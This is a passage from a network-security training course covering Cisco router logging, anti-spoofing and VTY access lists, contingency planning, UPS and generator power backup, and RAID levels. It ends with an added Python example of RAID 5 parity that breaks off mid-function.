• The source interface for the messages is the actual network interface that will send the messages to the syslog server.

The following configuration fragment shows the setup of a router to use a syslog server.

Router#configure terminal
Router(config)#logging on
Router(config)#logging trap 5
Router(config)#logging 10.20.30.45
Router(config)#logging facility Local5
Router(config)#logging source-interface Ethernet 0
Router(config)#^Z
Router#

In this example, logging has been enabled. Logging is going to be sent to a syslog server, logging messages that are level 5 or more critical. The IP address of the syslog server is 10.20.30.45. (Additional servers can be used with multiple commands using different IP addresses here, for redundancy.) The facility on the syslog server is Local5, and the source for these messages is Ethernet 0 on the router.

TASK 5F-1
Configuring Buffered Logging

1. Create the configuration fragment you would use for buffered logging, using 32 kilobytes of memory. Include all timestamping options and log level 4 events. Assume that the router is running IOS version 12.2.

Router#configure terminal
Router(config)#logging on
Router(config)#logging buffered 32000 4
Router(config)#service timestamps log datetime msec localtime show-timezone
Router(config)#^Z
Router#


ACL Logging

The previous section on logging focused on the system log events, critical errors, and messages. Another important area to investigate is the use of logging in relationship to your Access Control Lists. When implemented, ACL logs are listed as Level 6 events.

In order to implement ACL logging, the commands are very simple. All you need to add is the keyword log or log-input to the end of the ACL statements. You do not want to add this to all your ACL statements, however, or you will flood your logs with so much information that you will be virtually unable to identify anything useful.

Use of the log keyword will list the type, date, and time in the ACL log, and is a valid option only for standard ACLs on IOS version 12.0 and newer. The log-input keyword adds information on the interface and source MAC address; an example of its use is when the same ACL is to be applied to more than one interface.

Logging may be one reason that you do not count on the default deny all rule of an ACL. If a packet is dropped due to the default deny all statement, that packet will not be logged. If, however, you add the following line as your last statement in the ACL, then packets will be logged: access-list 123 deny ip any any log.

Anti-spoofing Logging

Earlier, you looked at the creation of anti-spoofing ACLs. In this section, you will see these ACLs used with the logging function to gather information for analysis. In these examples, assume that the internal network is 172.16.0.0/16. First, the configuration fragment of the list itself:

Router#configure terminal
Router(config)#access-list 123 deny ip 172.16.0.0 0.0.255.255 any log-input
Router(config)#access-list 123 permit ip any any
Router(config)#access-list 145 permit ip 172.16.0.0 0.0.255.255 any log-input
Router(config)#access-list 145 deny ip any any log-input
Router(config)#^Z
Router#

For the next example, assume that the router has one internal Ethernet interface (where the trusted network is located) and has two external serial interfaces. The following configuration fragment shows the application of the ACLs, first list 123 then list 145, on their proper interfaces.

Router#configure terminal
Router(config)#interface Serial 0
Router(config-if)#ip access-group 123 in
Router(config-if)#exit
Router(config)#interface Serial 1
Router(config-if)#ip access-group 123 in
Router(config-if)#exit
Router(config)#interface Serial 0
Router(config-if)#ip access-group 145 out
Router(config-if)#^Z
Router#


VTY Logging

When gaining access to the router, a primary method used was through VTY sessions. These sessions may come under frequent attack at larger organizations. You will want to know who is and who is not successful at gaining access via VTY sessions—again, logging is the answer to that need.

In this example, you will again assume the internal network 172.16.0.0/16, and that there is only one trusted host that has authorized VTY access, 172.16.23.45. With those variables defined, the following is the configuration fragment that will log VTY sessions on the router.

Router#configure terminal
Router(config)#access-list 155 permit ip host 172.16.23.45 any log-input
Router(config)#access-list 155 deny ip any any log-input
Router(config)#^Z
Router#

Once you have created the list, as shown, you will need to apply the list. In the following configuration fragment, the list is applied to VTY sessions 0 through 4.

Router#configure terminal
Router(config)#line vty 0 4
Router(config-line)#access-class 155 in
Router(config-line)#^Z
Router#


TASK 5F-2
Configuring Anti-spoofing Logging

1. Create a logged ACL that is used for anti-spoofing, using the following information: The router has interfaces Ethernet0, Serial0, and Serial1. Ethernet0 is connected to the only trusted network, which has the IP address 192.168.45.0/24. For this exercise, and in the interest of time, only create anti-spoofing for the defined network. If you want to expand this to include all private and reserved networks, you can do so, but it is not required.

Router#configure terminal
Router(config)#access-list 160 deny ip 192.168.45.0 0.0.0.255 any log-input
Router(config)#access-list 160 permit ip any any
Router(config)#access-list 170 permit ip 192.168.45.0 0.0.0.255 any log-input
Router(config)#access-list 170 deny ip any any log-input
Router(config)#^Z
Router#
Router#configure terminal
Router(config)#interface Serial 0
Router(config-if)#ip access-group 160 in
Router(config-if)#exit
Router(config)#interface Serial 1
Router(config-if)#ip access-group 160 in
Router(config-if)#exit
Router(config)#interface Serial 0
Router(config-if)#ip access-group 170 out
Router(config-if)#^Z
Router#

Summary

In this lesson, you examined the fundamentals of router security and the principles of routing. You created the configurations that are required to harden a Cisco router and configured the removal of services and protocols. You examined the process of the wildcard mask and how it relates to the Cisco ACL. You created the configurations for ACLs to defend the network against attacks. Finally, you examined the process of logging on a Cisco router and configured buffered and anti-spoofing logging.


Lesson Review

5A What is authentication?

Authentication is the process of identifying a user, generally granting or denying access.

What is authorization?

Authorization is the process of defining what a user can do, or is authorized to do.

What is AAA?

Authentication, Authorization, and Accounting.

What are the methods of access to a Cisco router?

• Console port

• Auxiliary port

• VTY sessions

• HTTP

• TFTP

• SNMP

5B List some of the advantages of using static routing.

Responses might include:

• Precise control over the routes that data will take across the network.

• Easy to configure in small networks.

• Reduced bandwidth use, due to no excessive router traffic.

• Reduced load on the routers, due to no need to make complex routing calculations.

What is a security advantage to using RIPv2 over RIPv1?

Using RIPv2 provides the security advantage of authentication, enabling the routers to identify who is and who is not able to update routing information.

5C What is a security reason for disabling CDP?

CDP might be broadcasting information about the router that is not intended to be public knowledge.

What is an attack that you can defend against by disabling ICMP directed broadcasts?

Smurf.

5D What type of Access Control List allows for the checking of port numbers?

Extended ACLs allow for port checking.


When a packet enters the router, what is the first thing the router will check regarding that packet?

Is there a route for this packet? If yes, send to the ACLs if there are any; if no, discard the packet (and respond to the sender if need be).

5E What is the syntax for a standard Access Control List?

Router(config)#access-list access-list-number {permit|deny} source [source-mask]

What is the syntax for an extended Access Control List?

Router(config)#access-list access-list-number {permit|deny} protocol source source-mask destination destination-mask [operator|operand]

What is the syntax for implementation of a standard Access Control List?

Router(config-if)#ip access-group access-list-number {in|out}

5F When a configuration change is made to the router, such as an interface being brought down, what level of message will this generate?

Level 5.

What is the command for an access list to be implemented on the VTY sessions?

access-class [access list number] in


Contingency Planning

Overview

In this lesson, you will take a look at various types of disasters that can befall an organization and put it out of business—unless the organization has implemented some form of business continuity planning. You will look at how such plans can be developed and tested. You will review some technologies that can help keep you powered on, backup strategies for operating systems, and products that can be used in various situations.

Objectives

In this lesson, you will:

6A Identify disaster types, examine issues related to contingency planning, and consider the role of security policies as part of an overall contingency planning strategy.

In this topic, you will see why you have to plan for backups, look at the various types of disasters that can occur, and briefly look at security policies and their effect on business.

6B Analyze contingency planning goals, and review the testing of such plans.

In this topic, you will analyze the goals of a contingency plan, and look at the various aspects of testing a contingency plan.

6C Study the effect of electrical power loss on networks and the backup planning required to prevent such events.

In this topic, you will analyze the effects of losing electrical power on your network, and look at various devices that you can use to defend against such disturbances, such as UPS devices and generators.

6D Examine data-backup strategies for various operating systems and perform tasks related to backups.

In this topic, you will look at backup strategies for operating systems, such as RAID, and other archival options, such as tapes or other hard drives. You will perform hands-on operations detailing the differences between normal, differential, and incremental backups. You will also perform a backup of a Cisco router's configuration.

LESSON 6

Data Files: none

Lesson Time: 4 hours


Topic 6A
Continuity and Recovery

Contingency planning forms a significant part of modern business. If a business is to survive a disaster and move forward, it has no choice but to plan for and allocate sufficient resources to cater to the recovery process. When continuity and recovery planning are discussed in boardrooms, computers and networks are just one of the many issues talked about—although most businesses have, in the last decade, begun to rely heavily on technology to get the job done. Computers and networks are therefore justifiably critical components in any modern business.

For this lesson, we will look at continuity and recovery for the following areas:

• Computers

• Networks

• The premises that house them

Planning for Backups

Before a continuity and recovery system is put into place for an organization, a study needs to be undertaken in order to classify the nature of the business and its requirement for putting a recovery system in place.

This study can be undertaken by one person or by a team of people representing a cross-section of the people employed by the organization, depending on the size of that organization. As with anything that has a financial connotation, the organization's upper management has to be involved and made aware of the implications of implementing the various technologies involved, but upper management does not necessarily need to have all of the little details.

Depending on the problems that need solving, solutions can vary. Beginning with creating an Appropriate Resource Usage document or Acceptable Use Policy for the users, to controlling user behavior within the bounds of acceptance, to defining what resources need protection and what resources need to be backed up, to defining what resources need to have a redundant but live copy—the individuals or the team members leading the study have their work cut out for them.

Disasters

Disasters that can affect businesses can be classified into various categories depending on who you talk to; however, we can start by classifying them broadly into natural and man-made categories. Here are some examples of each:

• Natural disasters include:

— Floods.

— Earthquakes.

— Tornadoes.

— Getting hit by a meteorite.

• Man-made disasters include:

Acceptable Use Policies will be dealt with in greater detail in the Network Defense and Countermeasures course.

Examples of Disasters


— Intentional disasters, such as terrorist attacks, worker lockouts/strikes, and so forth.

— Unintentional disasters, such as design error, operator error, mismanagement, and so forth.

You may have noticed that we didn't mention fire in the enumeration of disasters. Fires can be a result of either a natural or man-made cause. When fires are man-made, they could be intentional or unintentional.

Not much can be done to prevent natural disasters. You should, however, have a recovery plan. For a recovery plan to be effective, it should be housed in structurally and environmentally sound buildings or it should be housed far away, perhaps in another geographic location, if your business is to survive such calamities.

As an example, and on a more serious note, just a few days after the 9-11 terrorist attacks, American Express sent an email to all its valued customers, reassuring everyone that even though their offices in Manhattan were affected, their business was not, due to the excellent backup and recovery systems maintained elsewhere.

Environmental Disasters

Analyzing which natural disasters to take into account, and which not to, is fairly straightforward. First, list all known natural disasters, then highlight those that are likely in your location. Those that are not highlighted are extremely unlikely or improbable for that location.

Certain natural disasters are known to be fairly regular in certain locations. For example, in some low-lying areas of Florida, the threat of flooding is fairly high during the hurricane season. Tornadoes are common in Kansas, forest fires break out now and then in the southwest regions of the U.S., and the threat of an earthquake always looms over one well-known city in California.


Technological or Man-made Disasters

In analyzing which man-made disasters to take into account, and which not to, all bets are off. Let's revisit the list we created earlier. Broadly speaking, man-made disasters are divided into intentional and unintentional subcategories.

• Terrorist attacks are intentional. They can be vicious, physical attacks, or they can be more subtle, such as cyber-terrorism.

• Worker lockouts or worker strikes are generally known to the management beforehand, so some planning can be done.

• Computer viruses, worms, and Trojan horses all fall under the man-made and intentional categories. Programmers who write and spread such code do so with the knowledge that their creations are going to cause harm. These are disasters waiting to happen. Sometimes these programs are released under the guise of remote management tools, but they can be used maliciously, nevertheless. Attacks fashioned against email and Web servers aim to paralyze a company by targeting its digital nervous system. Today, firewalls, intrusion detection systems, and response systems are part of a huge industry, thanks to the previously-mentioned breed of programmers.

• Unintentional man-made disasters are very difficult to gauge or predict. If a disaster is due to a design error, you generally have to go back to the drawing board. If it's due to operator error or mismanagement, you have to reform your usage policies.

• Sometimes, just the day-to-day wear and tear on computer systems will bring them down. The classic components in computer systems that suffer such wear and tear are the hard drives, simply because they are comprised of moving parts—spinning disks and read/write heads that swing back and forth along the disk surfaces. Modern hard drives are surprisingly durable, but they still have a useful life of around five years. Since data and programs reside mainly on hard drives, you have to plan on backing them up periodically.

• Electrical power fluctuations—spikes, surges, sags, brownouts, faults, and blackouts—can also cause havoc; therefore, one of the preventive measures that must be addressed should deal with conditioning and steadying the power supply before it is fed into your computer and network systems.

• Loss of electrical power, even momentarily, can be disastrous, so all sensitive systems should be able to instantaneously switch over to a backup power system. A better method would be to run the systems off of the backup system while continually recharging it. This should not surprise anyone—take a look at how your notebook works. In fact, some companies that have realized this are beginning to furnish every user's desk with a docking station and a notebook instead of a desktop PC, simply because a momentary power outage would not disrupt anybody's work.

Security Policies and Their Impact on the Business

In Network Defense and Countermeasures, the next course in this series, you will do a lot more work on analyzing risk and formulating security policies for your organization, so we will just touch on it lightly here.

virus: A program that can "infect" other programs by modifying them to include a possibly evolved copy of itself.

worm: Independent program that replicates from machine to machine across network connections, often clogging networks and information systems as it spreads.


Before writing a security policy, all risks that can be foreseen have to be analyzed. Broadly speaking, there are two kinds of analyses that can be performed: qualitative and quantitative.

Quantitative Risk Analysis

It's the quantitative risk analysis that will interest the upper management of a company (those who allocate budgets, for instance), because with this method, a dollar value can be assigned to the potential risk at hand. A quantitative analysis has two basic parts: the probability of a threat occurring and the estimated loss that will result from the threat.

Insurance companies use quantitative analysis frequently. Think for a few minutes on the initial conversation you had with your motor vehicle insurance provider. What kinds of questions were you asked? Typically, you would have been asked to answer the following kinds of questions:

• What is the make and model of the car?

• What is your age, as well as the age of anyone else who would be driving the car?

• How many miles a day would you typically drive to work?

• Do you park your car in an enclosed space or on a street side?

• Does your car have airbags?

• Do you wear seat belts? It may be the law, but they will still ask you.

• Have you been ticketed for speeding before?

• Have you, as a driver, been involved in any accidents before?

• What kind of coverage do you expect to have?

Basically, the insurance company profiles you according to the answers that you provide to these questions. Between the profile they create of you and the kind of coverage you expect to have, they will give you a quote for your monthly, quarterly, half-yearly, or annual premium. They have thus performed a quantitative risk analysis on you and your car.

To create a quantitative risk analysis for your computers and networks, you would do something similar. For example, you might use the following sequence:

1. Create an inventory of all assets within your network.

2. Identify all of your users, including information about the type of users, their day-to-day demands on the network, and so forth.

3. Analyze what kind of security systems you have, such as authentication mechanisms and access control.

4. Determine what kind of backup systems are already in place.

5. Identify what risks are covered and what are not.

6. Determine if the uncovered risks are acceptable to your company.

Based on analyses like these, you would be able to recognize the need for backup systems, what your company would do in the event that disaster struck, and how the recovery methodologies would be put to work.

threat: The means through which the ability or intent of a threat agent to adversely affect an automated system, facility, or operation can be manifest. A potential violation of security.


Lesson 6: Contingency Planning 383


Backup and Recovery Policies

The backup and recovery section of a security policy provides the foundation for the continuity of the entire organization. A generic definition of the policy is that it provides a document, or a set of documents, that describe the backup security controls that are to be implemented in an organization. From a benefit standpoint, the policy is able to provide the organization with several key points. These benefits can be generalized into the following:

• They lower the legal liability to employees and third-party users of resources.

• They prevent waste of resources.

• They protect proprietary and confidential information from theft, unauthorized access or modification, or internal misuse of resources.

Topic 6B
Developing the Plan

To develop an effective contingency plan, you need to have some ideas about what the plan should cover, as well as how to test it so that you know that it will work when you need it to. Let’s begin by looking at what you want the plan to accomplish.

Requirements and Goals of a Contingency Plan

Once a risk analysis has been done for a company, and it has been agreed to by the planning team, it will be up to the executive group to implement a contingency plan. All items that require some form of backup plan have to be listed. For example, take a look at the following table.

Number  Item                    Standard          Backup
1       Electrical power        Utility company   UPS
2       Computer data           Hard drives       Tape drives
3       Backed-up data          Tape drives       DVD-R
4       Internet access         T1 from ISP A     SDSL from ISP B
5       Internet access backup  SDSL from ISP B   Via satellite from ISP C

In this table, you can see that there are secondary backup plans for the backup plans themselves. This depends on the criticality of the item in question. If Internet access is a critical issue, then the company has to choose its ISP(s) wisely. Not only should the company hedge its bets with multiple ISPs, it also should make sure that it has a different physical line running out of its building to the ISP. If an ISP is offering DSL services by leasing bandwidth from your local phone company and the local phone company has a fault, then your company may not have Internet access at all for a couple of days until the fault on the phone line is rectified. A wireless solution via satellite, for example, will take a completely different path out of your building and may allow you to hedge your bets.


Listing the goals of contingency planning is a critical step, as this will have a direct bearing on how the plan should be implemented and in what sequence. The previous table looks like somebody read the minutes of the first brainstorming meeting and attempted to order the list into a chart. It is clearly a first attempt. After a few more meetings, more issues will be brought forth and may include other items that are imperative for the business if it has to survive a disaster.

Not only should the contingency plan list and analyze all possible threats to the business, the backup plans to counter these threats should also be graded in order of importance to the continuity of the business. Responsibility has to be assigned to a person, and a brief description of the job required to carry out that plan has to be noted. The person selected (or the position in the company) has to be provided appropriate authority to carry out the task. Emergency roles have to be defined. The priority of tasks to be carried out has to be listed as per the grades allocated. Finally, a simulation of the crisis has to be carried out.

Creating the Contingency Plan

The team of people designated to handle a crisis can be a different team from the one handling that job on a daily basis. Some diversity is desired, because in an emergency, the people who handle the job on a daily basis may not be around. If immediate action is paramount (for example, if backup tapes have to be used to restore the systems right away), then more than one network administrator must be trained in this process. This is an extremely critical process—restoring the wrong backup data could set the company back by that many days, weeks, or maybe even months.

Testing the Plan

Any backup and restore plan that you come up with must be tested, both in theory and in practice. The theoretical outline must be vetted by more than one person involved in the system and their comments debated. Once everyone involved in the process is in agreement, the plan has to be clearly stated. All concerned personnel involved in the recovery effort should be given a copy of this plan for study.

Testing of plans can be done at various levels and intensities. They are broadly divided as follows:

• Simulated testing on paper (or check list test).

• Limited environment simulation (or structured walk-through test).

• Full-scale environment simulation (or full interruption test).

Simulated Testing on Paper (the Check List Test)

When all of the personnel involved in the recovery effort have been given sufficient time to study their roles in the recovery process, they should walk through the steps in a sort of dry run of the procedures involved. This is also known as a check list test or a simulated paper test. Different disaster scenarios are recorded on a whiteboard, and the various personnel start filling in the blanks to the recovery plan based on the role(s) allocated to them. This is akin to reading through a script before staging a rehearsal for a play.


Limited Environment Simulation (the Structured Walk-through Test)

An example of limited environment simulation that many of you might be familiar with is when the electronic surveillance monitoring and security systems are first installed at your premises. After the alarm system has been installed, a select few people with certain levels of responsibility in the company are informed of the code to enter upon opening the premises. The contact phone numbers for these people are given to the company that installed the security system. Upon installation of the system and initial testing, the system alarm is tripped, and the alarm is automatically sent to the security company. The security company personnel look up their list of phone numbers for your company and proceed to call each one, in turn, down the list. If none of the people on that list answer the phone, then the local police are called in to investigate a potential break-in.

Another example is the fire drill, typically carried out in tall buildings. When fire-escape drills are first explained to the general building populace, every aspect of the escape process is walked through. These are also referred to as structured walk-through tests.

Similarly, once a backup system is in place, then the recovery system should be put through its paces to make sure it works. When various departments in an organization that normally interact with each other in a certain way now find that there are other interaction channels, situations may arise. Typical problems that occur have to do with the hierarchical nature of most large organizations. A person at a senior level in one department may feel that he or she does not have to answer to a person in a peer position in another department. These issues should be catalogued, then the backup and recovery plan should be reviewed to take them into account.

Full-scale Environment Simulation (the Full Interruption Test)

In a full-scale simulation test, a disaster scenario is chosen and the recovery plan for that scenario is actually executed, step by step, to see if it works. Restrictions to the availability of resources are mimicked as with an actual disaster. The simulation may be designed so that any backup or recovery mechanisms that are available at a hot, warm, or cold site (you’ll see more about these later) that need to be accessed to expedite recovery can be accessed.

Unexpected or unpredictable events can occur during a simulation test. As with the structured walk-through tests, such events should be recorded, then the backup and recovery plan should be reviewed to take them into account. Once the reason for the unexpected event is understood, then the backup and recovery plan should be modified to take this into account. In an actual simulation test, the organization’s day-to-day workings are not disturbed, because only those personnel involved in the recovery operations are affected.

A full-scale simulation can also be undertaken so that all aspects of a recovery process are tested. This kind of test is performed infrequently, with retests spaced far apart, as it is disruptive to the organization. The majority of the people in the company are not told in advance that it is a test. Such a test, also termed a full interruption test, will actually test the reaction of all the personnel within the organization. Not everybody reacts well under stress, and this test will help in identifying those people who can be trusted to undertake critical jobs in an emergency.

This is different than having an unannounced drill, where the occupants are caught by surprise, and the sanctity of the drill is maintained by carrying it out at irregular intervals.

availability: Assuring information and communications services will be ready for use when expected.


Topic 6C
The Technologies of Staying On

Most of us rely on our local power utility companies as our primary power source. Depending on the criticality of the business, we may choose to supplement this with some form of battery backup or even generate our own power, with appropriate technologies to assist in the switchover.

Spike busters and surge suppressors help protect against only spikes and surges; voltage stabilizers help protect against spikes, surges, and sags. Not only do backup batteries take care of those scenarios, they also help protect against faults and brownouts, as well as short-term blackouts. Generator sets help protect against prolonged blackouts. Figure 6-1 will help explain these relationships better.

Figure 6-1: Disturbances in electrical supply and their remedies.

Personal UPS Devices

If you visit www.tigerdirect.com and look for power protection devices, you will see the following subcategories: surge suppressors, UPS Battery Backup (Personal), UPS Battery Backup (Business), UPS Battery Backup (Network). This is pretty much how UPS devices are cataloged.

Even if you are not going to buy a UPS system, you should at least have a surge suppressor. Having said that, most personal-use UPS devices are quite affordable and are a must for small businesses. They are rated from around 150 to 300 watts, and provide enough time (about 15 minutes) for you to at least save your work, finish small print jobs, and shut down the computer properly.


Smarter UPS systems will have a separate communication channel with your PC via the serial port or a USB port. In case you are not around when the power fails, the UPS will initiate a clean shutdown of the system.

On a Windows machine, you can use the Power Options Control Panel to manage your UPS devices. This interface was developed by APC for Microsoft. On a Linux machine, you can use APCUPSD (APC’s UPS Daemon), which is available at www.apcupsd.com/index2.html.

TASK 6C-1
Configuring a UPS

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Open the Power Options Control Panel.

2. Select the UPS tab.

3. In the Details box, click the Select button.

4. Under Select Manufacturer, select American Power Conversion. There are many models to choose from.

5. Select Back-UPS Pro. For On Port, verify that COM1 is selected. Click Finish. Now you should see the Configure button.

6. Click Configure.

It does not matter that you do not have a UPS; you are just taking a look at how to configure one.


7. Examine the options. They include Minutes On Battery Before Critical Alarm, When The Alarm Occurs Run This Program, and Next, Instruct The Computer To Shutdown.

8. Click Cancel twice, and close the Control Panel window.

Full Server Rack UPS Devices

Higher-end UPS devices are essentially the same in function as their smaller cousins, but with some significant differences that add to their costs, such as:

• Increased battery capacity (high-end models enable you to hot-swap batteries).

• Battery packs typically have faster recharge times.

• The software used to communicate with the PC is richer in features.

• Some UPS devices are SNMP-compatible (directly addressable on a network, or even via the Web), apart from the usual communication channels (serial or USB ports).

• Incoming and outgoing electrical supplies are vigorously monitored.

• Event logging may be included.

• Output is sometimes user-adjustable.

• Displays on the UPS devices can be LCD readouts, rather than just LED signals.

• Some UPS devices can be rack-mounted. Such devices, being modular, allow for easy expansion.

• High-end models may go up to 500 kW to 1 MW, requiring a three-phase circuit.

• A greater range of environmental variables for operation is available.

• Some UPS models may themselves be fault-tolerant (that is, they will have some level of redundancy built in).

Building Generators

About 15 years ago, the Indian government wanted to buy a Cray supercomputer for weather analysis and prediction. The U.S. government stepped in and blocked the sale, suspecting that the supercomputer could be clandestinely used for military purposes. The Indian government then turned to its premier computer engineers and programmers at the Centre for Development of Advanced Computing (CDAC), who then proceeded to design and build a massive parallel distributed computer (PARAM) by using a bunch of mini computers and hundreds or thousands of PC-class computers, all on a network.

One of the pilot projects was housed in a single building with entire floors filled with workstations. The incoming power supply was stabilized and fed to a switching station. If this external power supply ever tripped, a backup generator that could meet the needs of the whole building would take over. If this backup generator ran out of fuel (diesel) or malfunctioned, a second identical backup generator would take over. If either of these malfunctioned or if diesel was in short supply, a third backup generator would kick in. This third backup generator ran on a fuel other than diesel. The power generated was also stabilized and fed to the switching station. The basement was taken over and dedicated to banks of batteries from floor to ceiling. So a steady source of electricity, whether from an external source or from the generators, constantly recharged these banks of batteries, which then fed squeaky-clean power to the computers in the building. In effect, the entire building was a single computer and the basement was the UPS.

Figure 6-2: Multiple backups of power supplies for the CDAC pilot.

Needless to say, the engineers accomplished their task in a few years and delivered the equivalent of a supercomputer.

Do most companies go to these extremes when designing electrical systems for their networks? Not likely. But would they do it if it was mission-critical? Absolutely. The above example is just one of thousands of such installations across the U.S. and around the world.

Generator Types

Electrical output can be broadly classified into two types: DC (Direct Current) and AC (Alternating Current). As we all know, the advantage of DC is it can be stored, while AC cannot. AC can, however, be piped over vast distances, albeit with some losses along the way.

Depending on the country you are in, the voltage required to run most of your electrical equipment can be broadly divided into 110 V AC at 60 Hz (mostly North America) or 220 V AC at 50 Hz (the rest of the world), though you will find exceptions here and there. Cuba, for example, supports both 110 V and 220 V. For a more comprehensive list, visit http://kropla.com/electric2.htm.

Portable generators are generally in the 5 kW range and top out at around 8 to 10 kW. Typical home systems top out at around 20 kW, while on-site generators for buildings can be installed at various capacities—typically from 50 kW systems to 2 MW systems, depending on your requirements and budgetary constraints. As of this writing, it costs approximately $800 to $1200 per installed kW in the U.S., so a 50 kW system may cost around $60,000 to install while a 2 MW system may cost around $1.6 million to install. Note that there are a number of variables to consider, so these figures are useful only for initial discussions. You have to work with a manufacturer for more accurate pricing. Most of your electrical equipment then converts the received AC power as required for the job. For a first look at such issues, check out this Web site: www.westernmachinery.com. Of course, you can always start at the world’s number 1 electrical company, GE, at their Web site: www.gepower.com.

Visit www.flintenergies.com, a Georgia-based company, and click the Energy Library link for a good tutorial on energy, power generation, and related issues.

Because AC power typically suffers from fluctuations, it is necessary to condition it before it reaches sensitive electrical equipment, for which we typically use devices like voltage stabilizers and spike busters.

Fuel Types

Diesel, propane, kerosene, gasoline (or petrol), CNG (compressed natural gas), LNG (liquefied natural gas), methanol, and ethanol are all popular types of fuel used by generators. The decision to use one type of fuel over another is typically made from a purely economic standpoint (apart from the fact that all of them release pollutants into the atmosphere and the local laws governing storage, use, and pollution control vary). In a few years, this topic will have to be completely rewritten, with emerging fuel-cell technologies holding a lot of promise.

Generator Implementation

Most small and medium-sized businesses in the U.S. take it for granted that electricity is to be purchased from the utility company serving their locality and that on-site power generation is only a fault-tolerant measure. Larger establishments, however, that are fed up with erratic pricing and supply by utility companies (reinforced all the more by the events that took place early in 2001 in California) can make a conscious decision to install their own generation plant, and completely bypass the utility company altogether. In fact, they can even connect back to the grid and sell any excess power generated to the utility companies. The decision to implement a generator system for your building(s) is driven by economics of scale, but at least the consumer has a growing list of options that weren’t available just a decade ago.

Topic 6D
Backing Up the Operating Systems

There are many options for backing up the operating system, including:

• A tape backup of the OS. There are many methods of using tapes to back up the OS. Operating systems might have their own backup software, or you can go with vendor-specific solutions. More about tape backups will follow later.

• Using fault-tolerant disk configurations allowed by the OS. This is one of the first steps to take when implementing some measure of backup. Such configurations are also termed Redundant Array of Independent Disks (RAID) and are assigned numbers to represent various configurations, such as disk mirroring (RAID 1) or disk striping with parity (such as RAID 5).

• Vendor-specific fault-tolerant configurations. As with tape backups, operating systems can have their own RAID software, or you can go with vendor-specific solutions. These are typically hardware solutions, such as a mirrored RAID 0, also known as RAID 10. Hardware solutions take the load off of the CPU and are therefore faster and more suited for heavy-duty servers. Low-end systems may simply use the operating system’s feature set to implement a supported RAID level. The decision to use one RAID level over another depends on disk-utilization efficiencies, and therefore, the time to restore, as well. For example, RAID 1 will allow you to utilize only 50 percent of the disk space earmarked. RAID 5 using three drives will allow you to utilize 66 percent (two out of three). However, in the event of a failure, RAID 1 will be up and running in next to no time, while RAID 5 will take some time to rebuild the data off the parity information stored on the other drives.

• A complete, fully functioning, machine configured as a backup. This is typically found in fault-tolerant cluster configurations. Two-way and four-way clusters are popular configurations, but can be implemented only by using operating systems at the higher end of the spectrum. Larger clusters can be created, but this requires highly specialized knowledge and personnel trained in the assembly of such systems.

• Over and above these ready-made solutions for backup, a usage policy is critical to the success of the backup operation. Users must be trained to store their finished work on the file servers, or policies should be enforced that would prevent users from accessing local storage space.

RAID Levels

To explain the various RAID levels, we will use several figures. As you review these figures, note that the word level is misleading, as it connotes that one level leads to another. It is better to simply think of these numbers the way we treat some letters of the Greek alphabet—as mathematical constants. Each figure also includes a percentage of efficiency. This is simply an indicator of how much disk space assigned to that RAID level can be used for actual data storage. It does not mean that one version is more efficient than the other. This is just a traditional way of expressing utilization percentage.

Figure 6-3 shows RAID level 1, with disk mirroring.

Figure 6-3: RAID level 1, disk mirroring.


Figure 6-4 shows RAID level 1, with disk duplexing.

Figure 6-4: RAID level 1, disk duplexing.

Figure 6-5 shows RAID level 5, with disk striping and parity.

Figure 6-5: RAID level 5, striping with parity.

Figure 6-6 shows RAID level 0, with a stripe set.


Figure 6-6: RAID level 0, stripe set.

Figure 6-7 shows RAID level 10, with a mirrored stripe set.

Figure 6-7: RAID level 10, mirrored stripe set.
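The utilization percentages in Figures 6-3 through 6-7, and the rebuild-time difference between RAID 1 and RAID 5 noted above, can be made concrete in code. The following Python is an added example (not from the course): it computes the usable fraction for each level and models RAID 5 striping with XOR parity, losing one drive and reconstructing it from the survivors. The 4-byte chunk size and the rotating parity placement are simplifying assumptions.

```python
"""Usable-capacity percentages for the RAID levels in Figures 6-3 to 6-7, plus a
byte-level model of RAID 5 striping, parity and rebuild. Constructed example; the
4-byte chunk size and left-rotating parity placement are simplifying assumptions."""
from typing import List, Optional

CHUNK = 4  # bytes per chunk per disk (real arrays use 64 KB or larger stripes)


def efficiency(level: str, disks: int) -> float:
    """Fraction of raw disk space usable for data, as the text defines efficiency."""
    if level == "0":                       # stripe set: no redundancy at all
        return 1.0
    if level == "1":                       # mirroring / duplexing: two copies
        if disks != 2:
            raise ValueError("RAID 1 mirrors exactly two disks")
        return 0.5
    if level == "5":                       # one disk's worth of parity, spread out
        if disks < 3:
            raise ValueError("RAID 5 needs at least three disks")
        return (disks - 1) / disks
    if level == "10":                      # stripe set whose members are mirrored
        if disks < 4 or disks % 2:
            raise ValueError("RAID 10 needs an even number of disks, at least 4")
        return 0.5
    raise ValueError(f"unknown RAID level {level}")


def xor_chunks(chunks: List[bytes]) -> bytes:
    """Bitwise XOR of equal-length chunks; this is all RAID 5 parity is."""
    out = bytearray(len(chunks[0]))
    for chunk in chunks:
        for i, byte in enumerate(chunk):
            out[i] ^= byte
    return bytes(out)


def parity_disk(stripe: int, disks: int) -> int:
    """Rotate the parity chunk across disks so one disk is not a write bottleneck."""
    return (disks - 1 - stripe) % disks


def stripe_raid5(data: bytes, disks: int) -> List[List[bytes]]:
    """Lay data out across `disks` drives; returns one list of chunks per drive."""
    per_stripe = CHUNK * (disks - 1)                # data bytes per stripe
    stripes = -(-len(data) // per_stripe)           # ceiling division
    data = data.ljust(stripes * per_stripe, b"\0")  # pad the last stripe
    drives: List[List[bytes]] = [[] for _ in range(disks)]
    for s in range(stripes):
        base = s * per_stripe
        chunks = [data[base + i * CHUNK: base + (i + 1) * CHUNK] for i in range(disks - 1)]
        parity = xor_chunks(chunks)
        data_iter = iter(chunks)
        for d in range(disks):
            drives[d].append(parity if d == parity_disk(s, disks) else next(data_iter))
    return drives


def read_raid5(drives: List[List[bytes]], disks: int) -> bytes:
    """Reassemble the data, skipping each stripe's parity chunk."""
    out = bytearray()
    for s in range(len(drives[0])):
        for d in range(disks):
            if d != parity_disk(s, disks):
                out += drives[d][s]
    return bytes(out)


def rebuild(drives: List[Optional[List[bytes]]], failed: int) -> List[bytes]:
    """Reconstruct every chunk of the failed drive by XORing the surviving drives.
    Every stripe must be read from every survivor, which is why a RAID 5 rebuild
    takes time while a RAID 1 mirror is usable immediately."""
    survivors = [drive for i, drive in enumerate(drives) if i != failed and drive is not None]
    return [xor_chunks([drive[s] for drive in survivors]) for s in range(len(survivors[0]))]


def demo() -> bool:
    """Stripe constructed data over three disks, lose one, rebuild it, verify."""
    data = b"Restore-time matters as much as capacity."
    drives = stripe_raid5(data, 3)
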